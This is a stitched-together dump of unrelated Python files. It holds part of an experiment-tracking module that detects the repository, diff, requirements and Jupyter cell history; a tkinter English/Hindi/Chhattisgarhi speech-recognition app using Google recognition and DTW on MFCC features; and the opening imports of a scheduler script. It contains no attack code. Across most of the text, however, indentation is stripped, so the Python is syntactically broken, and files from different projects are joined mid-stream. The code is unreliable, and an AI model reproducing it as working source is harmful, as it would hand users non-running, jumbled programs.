jupyter_filepath = cls._get_jupyter_notebook_filename() if detect_jupyter_notebook else None
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
scripts_path = [f for f in scripts_path if f.exists()]
if not scripts_path:
raise ScriptInfoError(
"Script file {} could not be found".format(filepaths)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
script_dir = scripts_dir[0]
script_path = scripts_path[0]
if force_single_script:
plugin = None
else:
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(
str(script_dir), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
except SystemExit:
raise
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
            # allow overriding the VCS working directory (note: relative to the git repo),
            # because remote PyCharm sessions can sync from a subfolder rather than from
            # the Git repo root, so the PyCharm plugin needs to pass the override
working_dir = VCS_WORK_DIR.get() if VCS_WORK_DIR.get() else cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=script_path.as_posix()
if not repo_info.url and script_path.is_file() else None,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
)
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True, add_missing_installed_packages=False,
detailed_req_report=None, force_single_script=False):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths,
check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log,
uncommitted_from_remote=uncommitted_from_remote,
detect_jupyter_notebook=detect_jupyter_notebook,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
force_single_script=force_single_script,
)
except SystemExit:
pass
except BaseException as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
git_root = os.path.abspath(str(script_dict['repo_root'])) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(
a_abs, os.path.join(git_root, str(script_dict['working_dir'])))
argvs += ' {}'.format(a)
# noinspection PyBroadException
try:
module_name = vars(sys.modules['__main__'])['__spec__'].name
except Exception:
module_name = vars(sys.modules['__main__'])['__package__']
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(module_name, (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
        # return a pair: (history as str, current cell if we are still in cell execution, otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
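# Minimal illustration of the behaviour above (not part of the original module; the
# sample string below is made up): _conform_code() comments out IPython-specific lines
# (get_ipython(), %magic, !bang) so the recorded notebook history stays valid plain Python.
if False:  # flip to True to try it in isolation
    _hl = _JupyterHistoryLogger()
    _sample = "\nx = 1\n%matplotlib inline\n!pip install numpy\nget_ipython().run_line_magic('time', 'x')"
    print(_hl._conform_code(_sample, replace_magic_bang=True))
    # the %, ! and get_ipython() lines come back prefixed with '# '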
|
Speech_Recognizer.py
|
import speech_recognition as sr
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import threading
import time
import os
import numpy as np
import librosa.display
import copy
import joblib  # sklearn.externals.joblib was removed in scikit-learn 0.23+; use the standalone joblib package
from winsound import *
from numpy import array, zeros, argmin, inf, ndim
from scipy.spatial.distance import cdist
import json
import sounddevice as sd
import soundfile as sf
from pydub import AudioSegment
from pydub.silence import split_on_silence
from os import listdir
from os.path import isfile, join
ed = []
with open('eng_dict.json') as data_file:
eng_dict = json.load(data_file)
for i in eng_dict:
ed.append(i)
filename = 'hin_dict'
hin_dict = joblib.load(filename)
###DTW
def dtw(x, y, dist, warp=1):
"""
Computes Dynamic Time Warping (DTW) of two sequences.
:param array x: N1*M array
:param array y: N2*M array
:param func dist: distance used as cost measure
:param int warp: how many shifts are computed.
    Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the warp path.
"""
assert len(x)
assert len(y)
r, c = len(x), len(y)
D0 = zeros((r + 1, c + 1))
D0[0, 1:] = inf
D0[1:, 0] = inf
D1 = D0[1:, 1:] # view
for i in range(r):
for j in range(c):
D1[i, j] = dist(x[i], y[j])
C = D1.copy()
for i in range(r):
for j in range(c):
min_list = [D0[i, j]]
for k in range(1, warp + 1):
i_k = min(i + k, r - 1)
j_k = min(j + k, c - 1)
min_list += [D0[i_k, j], D0[i, j_k]]
D1[i, j] += min(min_list)
if len(x)==1:
path = zeros(len(y)), range(len(y))
elif len(y) == 1:
path = range(len(x)), zeros(len(x))
else:
path = _traceback(D0)
return D1[-1, -1] / sum(D1.shape), C, D1, path
def accelerated_dtw(x, y, dist, warp=1):
"""
Computes Dynamic Time Warping (DTW) of two sequences in a faster way.
Instead of iterating through each element and calculating each distance,
this uses the cdist function from scipy (https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html)
:param array x: N1*M array
:param array y: N2*M array
:param string or func dist: distance parameter for cdist. When string is given, cdist uses optimized functions for the distance metrics.
If a string is passed, the distance function can be 'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation', 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean', 'wminkowski', 'yule'.
:param int warp: how many shifts are computed.
    Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the warp path.
"""
assert len(x)
assert len(y)
if ndim(x) == 1:
x = x.reshape(-1, 1)
if ndim(y) == 1:
y = y.reshape(-1, 1)
r, c = len(x), len(y)
D0 = zeros((r + 1, c + 1))
D0[0, 1:] = inf
D0[1:, 0] = inf
D1 = D0[1:, 1:]
D0[1:, 1:] = cdist(x, y, dist)
C = D1.copy()
for i in range(r):
for j in range(c):
min_list = [D0[i, j]]
for k in range(1, warp + 1):
min_list += [D0[min(i + k, r - 1), j],
D0[i, min(j + k, c - 1)]]
D1[i, j] += min(min_list)
if len(x) == 1:
path = zeros(len(y)), range(len(y))
elif len(y) == 1:
path = range(len(x)), zeros(len(x))
else:
path = _traceback(D0)
return D1[-1, -1] / sum(D1.shape), C, D1, path
def _traceback(D):
i, j = array(D.shape) - 2
p, q = [i], [j]
while (i > 0) or (j > 0):
tb = argmin((D[i, j], D[i, j+1], D[i+1, j]))
if tb == 0:
i -= 1
j -= 1
elif tb == 1:
i -= 1
else: # (tb == 2):
j -= 1
p.insert(0, i)
q.insert(0, j)
return array(p), array(q)
###DTW-End
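# Minimal usage sketch for the DTW helpers above (illustrative only; the two sequences
# are random placeholders, not MFCC features from this project).
if False:  # flip to True to try the DTW helpers in isolation
    _seq_a = np.random.rand(20, 13)
    _seq_b = np.random.rand(25, 13)
    _d, _cost, _acc, _path = dtw(_seq_a, _seq_b, dist=lambda a, b: np.linalg.norm(a - b))
    print("normalized DTW distance:", _d)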
reply = 0
entries = {}
textbs = {}
textpops = ""
test_files = []
current_test = ""
cg_dirname = ""
flag_audio_pop = 0
def language_selection_window(a):
global reply
e = entries["mic"]
reply = int(e.get())
# print(reply)
def enghin(a):
# global entries
# print(entries)
# e = entries["mic"]
# rep = int(e.get())
# print(rep)
global reply
rep = reply
# print(rep)
mic_list = sr.Microphone.list_microphone_names()
j = 1
mic_name = ""
sample_rate = 48000
chunk_size = 2048
for i, microphone_name in enumerate(mic_list):
# print(j,microphone_name)
if j == rep:
mic_name = microphone_name
# print("MIC",mic_name)
j += 1
r = sr.Recognizer()
mic_list = sr.Microphone.list_microphone_names()
for i, microphone_name in enumerate(mic_list):
if microphone_name == mic_name:
device_id = i
# print("HELL",device_id)
def exitf(a):
root.destroy()
def status_popup():
global textpops
savp = Tk()
savp.iconbitmap('wait.ico')
savp.wm_title("Recognition in progress...")
# Label(savp, text="Please wait...").grid(row=1, column=0, sticky="ew")
prog = Text(savp, height=10, width=40, bd=5, font=("Times", 20))
prog.grid(row=2, columnspan=3, sticky="ew")
# print("txtpps - ", textpops)
prog.insert(INSERT, " Recognition in progress, Please wait! \n")
prog.insert(INSERT, " Loading! \n")
start = time.time()
while not textpops:
if (time.time() - start) > 5:
break
prog.insert(INSERT, ".")
savp.update_idletasks()
savp.update()
textpops = ""
def speakeng(a):
with sr.Microphone(device_index=device_id, sample_rate=sample_rate, chunk_size=chunk_size) as source:
# Adjusting noise level
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
global textpops
t1 = threading.Thread(target=status_popup)
t1.start()
try:
text = r.recognize_google(audio, language='en-IN')
textpops = text
# print("Speakeng - ",textpops)
text = text + "\n"
eng.insert(INSERT, text)
except sr.UnknownValueError:
text = "\n---\nGoogle Speech Recognition could not understand audio\n---\n"
eng.insert(INSERT, text)
except sr.RequestError as e:
eng.insert(INSERT, "---")
eng.insert(INSERT,
"Could not request results from Google Speech Recognition service; {0}".format(e))
eng.insert(INSERT, "---")
t1.join()
# print("\nt1 still alive - ", t1.is_alive())
def speakhin(a):
with sr.Microphone(device_index=device_id, sample_rate=sample_rate, chunk_size=chunk_size) as source:
# Adjusting noise level
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
global textpops
t1 = threading.Thread(target=status_popup)
t1.start()
try:
text = r.recognize_google(audio, language='hi-IN')
textpops = text
# print("Speakhin - ", textpops)
text = text + "\n"
hin.insert(INSERT, text)
except sr.UnknownValueError:
text = "\n---\nGoogle Speech Recognition could not understand audio\n---\n"
hin.insert(INSERT, text)
except sr.RequestError as e:
hin.insert(INSERT, "---")
hin.insert(INSERT,
"Could not request results from Google Speech Recognition service; {0}".format(e))
hin.insert(INSERT, "---")
t1.join()
# print("\nt1 still alive - ", t1.is_alive())
def cleareng(a):
eng.delete(1.0, END)
def clearhin(a):
hin.delete(1.0, END)
def saveeng(a):
location = ""
def browse(a):
x = filedialog.askdirectory()
e = entries["save_file_location"]
e.insert(0, x)
location = x
def savv(a):
e = entries["save_file_location"]
location = str(e.get())
e = entries["save_file_name"]
name = str(e.get())
input = eng.get("1.0", 'end-1c')
# print(name)
loc = location + "/" + name + ".txt"
# print("\nFinal loc\n", loc)
f = open(loc, 'w')
f.write(input)
f.close()
sav.destroy()
sav = Tk()
sav.iconbitmap('save.ico')
sav.wm_title("Save English Transcript")
Label(sav, text="Enter the file name you want: ").grid(row=0, column=0, sticky=W)
e = Entry(sav, width=50)
e.grid(row=1, columnspan=2, sticky="ew")
entries["save_file_name"] = e
Label(sav, text="Choose the location to save at: ").grid(row=2, column=0, sticky=W)
folentry = Entry(sav, width=77)
folentry.grid(row=3, column=0, sticky="ew")
entries["save_file_location"] = folentry
ch = Button(sav, text="Browse")
ch.bind("<Button-1>", browse)
ch.grid(row=3, column=1, sticky="ew")
ttk.Separator(sav).grid(row=4, pady=2, padx=2, columnspan=3, sticky="ew")
ent = Button(sav, text="Save", width=11)
ent.bind("<Button-1>", savv)
ent.grid(row=5, column=1, sticky="ew")
sav.mainloop()
def savehin(a):
location = ""
def browse(a):
x = filedialog.askdirectory()
e = entries["save_file_location"]
e.insert(0, x)
location = x
def savv(a):
e = entries["save_file_location"]
location = str(e.get())
e = entries["save_file_name"]
name = str(e.get())
input = hin.get("1.0", 'end-1c')
# print(name)
loc = location + "/" + name + ".txt"
# print("\nFinal loc\n", loc)
f = open(loc, 'w', encoding="utf-8")
f.write(input)
f.close()
sav.destroy()
sav = Tk()
sav.iconbitmap('save.ico')
sav.wm_title("Save Hindi Transcript")
Label(sav, text="Enter the file name you want: ").grid(row=0, column=0, sticky=W)
e = Entry(sav, width=50)
e.grid(row=1, columnspan=2, sticky="ew")
entries["save_file_name"] = e
Label(sav, text="Choose the location to save at: ").grid(row=2, column=0, sticky=W)
folentry = Entry(sav, width=77)
folentry.grid(row=3, column=0, sticky="ew")
entries["save_file_location"] = folentry
ch = Button(sav, text="Browse")
ch.bind("<Button-1>", browse)
ch.grid(row=3, column=1, sticky="ew")
ttk.Separator(sav).grid(row=4, pady=2, padx=2, columnspan=3, sticky="ew")
ent = Button(sav, text="Save", width=11)
ent.bind("<Button-1>", savv)
ent.grid(row=5, column=1, sticky="ew")
sav.mainloop()
win.destroy()
root = Tk()
root.iconbitmap('icon.ico')
root.title("English and Hindi Voice Typing Editor")
Label(root, text="English Speech to text:").grid(row=0, column=0, sticky=W)
eng = Text(root, height=12, width=72, bd=5, font=("Times", 12))
eng.grid(row=3, columnspan=3)
se = Button(root, text="Speak English", width=11)
se.bind("<Button-1>", speakeng)
se.grid(row=6, column=0)
es = Button(root, text="Clear English", width=11)
es.bind("<Button-1>", cleareng)
es.grid(row=6, column=1)
ce = Button(root, text="Save English", width=11)
ce.bind("<Button-1>", saveeng)
ce.grid(row=6, column=2)
Label(root, text="Hindi Speech to text:").grid(row=7, column=0, sticky=W)
hin = Text(root, height=12, width=72, bd=5, font=("Times", 12))
hin.grid(row=10, columnspan=3)
sh = Button(root, text="Speak Hindi", width=11)
sh.bind("<Button-1>", speakhin)
sh.grid(row=13, column=0)
hs = Button(root, text="Clear Hindi", width=11)
hs.bind("<Button-1>", clearhin)
hs.grid(row=13, column=1)
ch = Button(root, text="Save Hindi", width=11)
ch.bind("<Button-1>", savehin)
ch.grid(row=13, column=2)
ttk.Separator(root).grid(row=14, pady=2, padx=2, columnspan=3, sticky="ew")
ex = Button(root, text="Exit", width=11)
ex.bind("<Button-1>", exitf)
ex.grid(row=16, columnspan=3, sticky="ew")
root.mainloop()
def exitwin(a):
win.destroy()
def test_folder(a):
def cg(a):
mfcc_arr = joblib.load('Training_mfcc_arr.pkl')
y = joblib.load('Training_y.pkl')
def exitcg(a):
cgroot.destroy()
def preprocess_mfcc(mfcc):
mfcc_cp = copy.deepcopy(mfcc)
for i in range(mfcc.shape[1]):
mfcc_cp[:, i] = mfcc[:, i] - np.mean(mfcc[:, i])
mfcc_cp[:, i] = mfcc_cp[:, i] / np.max(np.abs(mfcc_cp[:, i]))
return mfcc_cp
def audio_popup():
def play(a):
file = cg_dirname + "/" + current_test
PlaySound(file, SND_FILENAME | SND_ASYNC)
def exi(a):
global flag_audio_pop
flag_audio_pop = 1
savp.destroy()
savp = Tk()
savp.iconbitmap('audio.ico')
savp.wm_title("Audio Player")
Label(savp,
text="Click on Play to play the following Audio file:\n" + current_test + "\nClick on Exit to close this window.").grid(
row=1, column=0, sticky="ew")
se = Button(savp, text="Play", width=11)
se.bind("<Button-1>", play)
se.grid(row=2, column=0)
es = Button(savp, text="Exit", width=11)
es.bind("<Button-1>", exi)
es.grid(row=2, column=1)
savp.mainloop()
def recognize_mic(a):
fs = 44100
duration = 5 # seconds
myrecording = sd.rec(duration * fs, samplerate=fs, channels=2, dtype='float64')
print("Recording Audio")
sd.wait()
print("Audio recording complete , Play Audio")
sf.write("temp.wav", myrecording, fs)
sd.wait()
print("Play Audio Complete")
AudioSegment.ffmpeg = "C://ffmpeg//bin"
cwd = os.getcwd()
loc = cwd + "\\" + "temp.wav"
sound_file = AudioSegment.from_wav(loc)
audio_chunks = split_on_silence(sound_file,
                                            # must be silent for at least 250 ms
min_silence_len=250,
                                            # consider it silent if quieter than -38 dBFS
silence_thresh=-38
)
print("Hello")
for i, chunk in enumerate(audio_chunks):
out_file = cwd + "\\" + "temp\\temp_{0}.wav".format(i)
print(i)
if i < 10:
out_file = cwd + "\\" + "temp\\temp_0{0}.wav".format(i)
print("exporting", out_file)
chunk.export(out_file, format="wav")
foldname = cwd + "\\" + "temp"
onlyfiles = [f for f in listdir(foldname) if isfile(join(foldname, f))]
answer = ""
for i in onlyfiles:
# start = time.perf_counter()
yTest, srTest = librosa.load(foldname + "/" + i)
mfccTest = librosa.feature.mfcc(yTest, srTest)
mfccTest = preprocess_mfcc(mfccTest)
dists = []
                for k in range(len(mfcc_arr)):
                    mfcci = mfcc_arr[k]
disti = dtw(mfcci.T, mfccTest.T, dist=lambda x, y: np.exp(np.linalg.norm(x - y, ord=1)))[0]
dists.append(disti)
# plt.plot(dists)
min_dist = min(dists)
min_dist_index = dists.index(min_dist)
pre = int(y[min_dist_index])
output = hin_dict[pre]
answer = answer + " " + output
mi.insert(INSERT, answer)
def recognize_all(a):
start = time.perf_counter()
dirname = cg_dirname
files = test_files
Test_Result = []
Reult_indices = []
for j in range(len(files)):
start1 = time.perf_counter()
yTest, srTest = librosa.load(dirname + "/" + files[j])
mfccTest = librosa.feature.mfcc(yTest, srTest)
mfccTest = preprocess_mfcc(mfccTest)
dists = []
for i in range(len(mfcc_arr)):
mfcci = mfcc_arr[i]
disti = dtw(mfcci.T, mfccTest.T, dist=lambda x, y: np.exp(np.linalg.norm(x - y, ord=1)))[0]
dists.append(disti)
min_dist = min(dists)
min_dist_index = dists.index(min_dist)
pre = int(y[min_dist_index])
output = hin_dict[pre]
tt = time.perf_counter() - start1
output = "Input File : " + current_test + ".\nThe spoken word is : " + output + ".\nTime taken for Recognition : " + str(tt) + "\n"
micl.insert(INSERT, output)
Test_Result.append(hin_dict[pre])
Reult_indices.append(pre)
# print(hin_dict[pre])
tt = time.perf_counter() - start
output = "\nTotal Time taken for Recognizing "+str(len(test_files))+" Testing files : " +str(tt) + "\n"
micl.insert(INSERT, output)
#Accuracy
j=0
correct = 0
total_files = len(test_files)
#Precision
            precisions = np.zeros(58)
num = [0] * 58
den = [0] * 58
for i in range(len(Test_Result)):
den[Reult_indices[i]] += 1
lis = list(files[i].split('_'))
# print(eng_dict)
index = ed.index(str(lis[0]))
# print(index)
if Reult_indices[i] == index:
num[Reult_indices[i]] += 1
# print("Precisions word-wise:")
for i in range(58):
try:
precisions[i] = (num[i] / den[i]) * 100
                except ZeroDivisionError:
                    precisions[i] = -1
prc = np.array(precisions)
np.save("precisions",prc)
for i in test_files:
lis = list(i.split('_'))
index = ed.index(str(lis[0]))
true_value = hin_dict[index]
if Test_Result[j]==true_value:
correct+=1
j+=1
accuracy = (correct/total_files)*100
output = "\nAccuracy of the complete Recognition : " + str(correct) + " out of " + str(total_files) + ".\nAccuracy percentage : "+str(accuracy)+"\n"
anarray = [0,0]
anarray = np.array(anarray)
np.save("accuracy",anarray)
micl.insert(INSERT, output)
def selected_from_dd(*args):
global current_test
current_test = tkvar.get()
t1 = threading.Thread(target=audio_popup)
t1.start()
start = time.perf_counter()
yTest, srTest = librosa.load(cg_dirname + "/" + current_test)
mfccTest = librosa.feature.mfcc(yTest, srTest)
mfccTest = preprocess_mfcc(mfccTest)
dists = []
for i in range(len(mfcc_arr)):
mfcci = mfcc_arr[i]
disti = dtw(mfcci.T, mfccTest.T, dist=lambda x, y: np.exp(np.linalg.norm(x - y, ord=1)))[0]
dists.append(disti)
# plt.plot(dists)
min_dist = min(dists)
min_dist_index = dists.index(min_dist)
pre = int(y[min_dist_index])
output = hin_dict[pre]
tt = time.perf_counter()-start
output = "Input File : "+str(current_test)+".\nThe spoken word is : "+str(output)+".\nTime taken for Recognition : "+str(tt)+"\n"
sop.insert(INSERT, output)
global flag_audio_pop
if flag_audio_pop == 1:
t1.join()
flag_audio_pop = 0
fol.destroy()
cgroot = Tk()
cgroot.iconbitmap('icon.ico')
tkvar = StringVar(cgroot)
cgroot.title("Chhattisgarhi Small Vocabulary Speech Recognition")
drop_down_menu = OptionMenu(cgroot, tkvar, *test_files)
Label(cgroot, text="Recognize a single file, Choose from below: ").grid(row=0, columnspan=2, sticky="w")
drop_down_menu.grid(row=2, column=1, sticky="ew")
tkvar.trace('w', selected_from_dd)
sop = Text(cgroot, height=6, width=60, bd=5, font=("Times", 12))
sop.grid(row=2, column=0)
ttk.Separator(cgroot).grid(row=3, pady=2, padx=2, columnspan=3, sticky="ew")
Label(cgroot, text="Recognize all the Audio files of Test folder: ").grid(row=4, columnspan=2, sticky="w")
micl = Text(cgroot, height=6, width=60, bd=5, font=("Times", 12))
micl.grid(row=5, column=0, sticky="w")
reczall = Button(cgroot, text="Recognize All", width=11)
reczall.bind("<Button-1>", recognize_all)
reczall.grid(row=5, column=1, sticky="ew")
ttk.Separator(cgroot).grid(row=6, pady=2, padx=2, columnspan=3, sticky="ew")
Label(cgroot, text="Recognize through Mic (5-second recording): ").grid(row=7, columnspan=2, sticky="w")
mi = Text(cgroot, height=6, width=60, bd=5, font=("Times", 12))
mi.grid(row=8, column=0, sticky="w")
recmic = Button(cgroot, text="Recognize", width=11)
recmic.bind("<Button-1>", recognize_mic)
recmic.grid(row=9, column=1, sticky="ew")
ttk.Separator(cgroot).grid(row=10, pady=2, padx=2, columnspan=3, sticky="ew")
ex = Button(cgroot, text="Exit", width=11)
ex.bind("<Button-1>", exitcg)
ex.grid(row=11, columnspan=3, sticky="ew")
cgroot.mainloop()
def askfolder(a):
global cg_dirname
cg_dirname = filedialog.askdirectory()
folentry.insert(0, cg_dirname)
global test_files
test_files = [f for f in os.listdir(cg_dirname) if os.path.isfile(os.path.join(cg_dirname,f))]
if "desktop.ini" in test_files:
test_files.remove("desktop.ini")
# print(test_files)
win.destroy()
fol = Tk()
fol.iconbitmap('save.ico')
fol.title("Testing Folder Selection")
Label(fol, text="Choose the folder containing Testing Audio files:").grid(row=0, column=0, sticky=W)
folentry = Entry(fol, width=77)
folentry.grid(row=1, sticky=W, column=0)
ch = Button(fol, text="Browse")
ch.bind("<Button-1>", askfolder)
ch.grid(row=1, column=1, sticky=E)
ch = Button(fol, text="Next")
ch.bind("<Button-1>", cg)
ch.grid(row=2, columnspan=2, sticky="ew")
fol.mainloop()
popup.destroy()
win = Tk()
win.iconbitmap('icon.ico')
win.title("Select the language for Recognition")
Label(win, text="English/Hindi Speech to text:").grid(row=0, column=0, sticky=W)
se = Button(win, text="English/Hindi", width=11)
se.bind("<Button-1>", enghin)
se.grid(row=0, column=1, sticky="ew")
ttk.Separator(win).grid(row=2, pady=2, padx=2, columnspan=3, sticky="ew")
Label(win, text="Chhattisgarhi Small Vocabulary Recognition(Words listed below):").grid(row=4, column=0, sticky=W)
words = Text(win, height=4, width=60, bd=5, font=("Times", 12))
words.grid(row=6, column=0)
words.insert(INSERT, "'आबे', 'बईठ', 'बेरा', 'एती', 'गोड़', 'हमर', 'हे', 'जाहूँ', 'काबर', 'कहत', 'करत', 'खाबे', 'कोति', 'लइका','मोर', 'पीरात', 'रेंगत', 'टेरत', 'टूरा', 'तुमन'")
sh = Button(win, text="Chhattisgarhi", width=11)
sh.bind("<Button-1>", test_folder)
sh.grid(row=6, column=1, sticky="ew")
ttk.Separator(win).grid(row=10, pady=2, padx=2, columnspan=3, sticky="ew")
exx = Button(win, text="Exit", width=11)
exx.bind("<Button-1>", exitwin)
exx.grid(row=12, columnspan=3, sticky="ew")
win.mainloop()
def genlist(a):
mic_list = sr.Microphone.list_microphone_names()
j = 1
li = ""
for i, microphone_name in enumerate(mic_list):
temp = str(j)
temp = temp + " - " + microphone_name + "\n"
li = li + temp
j += 1
# print("\ngenlist's --\n",li)
e = textbs["miclist"]
# print("\ninslist's --\n", li)
e.insert(INSERT, li)
popup = Tk()
popup.iconbitmap('mic.ico')
popup.wm_title("Microphone Confirmation")
Label(popup, text="Enter the serial number of the appropriate mic from the following list").grid(row=0,column=0,sticky=W)
micl = Text(popup, height=6, width=30, bd=9, font=("Times", 12))
micl.grid(row=1, columnspan=1, sticky = "ew")
textbs["miclist"] = micl
gl = Button(popup, text="Generate list", width=11)
gl.bind("<Button-1>",genlist)
gl.grid(row=1, column=1, sticky = "ew")
e = Entry(popup,width = 50)
e.grid(row=7,sticky = "ew")
entries["mic"] = e
ent = Button(popup, text="Submit", width=11)
ent.bind("<Button-1>", language_selection_window)
ent.grid(row=7, column=1, sticky = "ew")
popup.mainloop()
|
main.py
|
import schedule
import time
import threading
import logging.config
from schedinstances.TextFileURLs import TextFileURLs
from schedinstances.ArtPackages import ArtPackages
from schedinstances.ArtMails import ArtMails, ArtDevMails
from schedinstances.BigTasks import BigTasks
from schedinstances.Harvester import Harvester
